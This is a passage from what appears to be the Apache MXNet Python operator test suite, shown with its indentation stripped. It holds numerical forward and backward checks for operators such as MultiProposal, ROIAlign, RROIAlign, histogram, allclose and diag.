rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
# Preparing the output of elements of the array, which are considered as "not close" AND
# corresponding elements of comparison CPU/GPU/Python vectors, which are considered as "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes == True))
idx = idx.reshape(1, idx.size)
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@with_seed()
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_context()])
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support set environment variable on the fly, so disable it for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
length = mx.sym.Variable("length", shape=(10, 10, 10))
sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
@with_seed()
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
@pytest.mark.serial
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
@with_seed()
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
# Note: the test is run both on GPU and CPU hosts, so that we can not assert
# on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: On a CPU only host CUDA sometimes is not able to determine the number
# of GPUs
if str(e).find("CUDA") == -1:
raise e
@with_seed()
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
